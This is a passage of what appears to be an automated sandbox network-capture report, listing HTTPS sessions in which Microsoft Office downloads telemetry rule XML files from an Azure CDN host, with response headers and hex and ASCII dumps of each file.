                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012316Z-1657d5bbd48cpbzgkvtewk0wu000000002z00000000023ds
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      119192.168.2.44986513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:16 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                                                      x-ms-request-id: 0c184816-a01e-000d-72ff-16d1ea000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012316Z-1657d5bbd48762wn1qw4s5sd3000000002q000000000932e
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      120192.168.2.44986713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:17 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:17 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                                                      x-ms-request-id: d3a3eb01-b01e-003d-1ef1-16d32c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012317Z-1657d5bbd48vlsxxpe15ac3q7n00000002t0000000009fhx
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:17 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      121192.168.2.44986813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:17 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:17 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                                                      x-ms-request-id: ca2bab4f-201e-0071-5e14-17ff15000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012317Z-1657d5bbd487nf59mzf5b3gk8n00000002bg00000000mdze
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:17 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      122192.168.2.44986913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:17 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:17 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                                                      x-ms-request-id: 4d8e59a4-701e-0021-64fe-163d45000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012317Z-1657d5bbd487nf59mzf5b3gk8n00000002ag00000000rz6e
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:17 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      123192.168.2.44987013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:17 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:17 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                                                      x-ms-request-id: 4ef38422-401e-000a-160c-174a7b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012317Z-1657d5bbd48dfrdj7px744zp8s00000002mg000000004pka
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:17 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      124192.168.2.44987313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:17 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:17 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1425
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                                                      x-ms-request-id: c326dec7-201e-0003-0c12-17f85a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012317Z-1657d5bbd48tnj6wmberkg2xy800000002yg000000002wrw
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:17 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      125192.168.2.44987513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1388
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                      ETag: "0x8DC582BDBD9126E"
                                                                                                                                      x-ms-request-id: 75ef523f-601e-000d-02f2-162618000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd48tnj6wmberkg2xy800000002y0000000004xh2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      126192.168.2.44987713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1378
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                      ETag: "0x8DC582BDB813B3F"
                                                                                                                                      x-ms-request-id: 87e265fd-201e-0051-4fe7-167340000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd48xlwdx82gahegw4000000003100000000060f8
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      127192.168.2.44987813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1405
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                      ETag: "0x8DC582BE89A8F82"
                                                                                                                                      x-ms-request-id: c9f5e5fc-201e-0071-5dfe-16ff15000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd48p2j6x2quer0q028000000030g000000008ruq
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      128192.168.2.44987613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
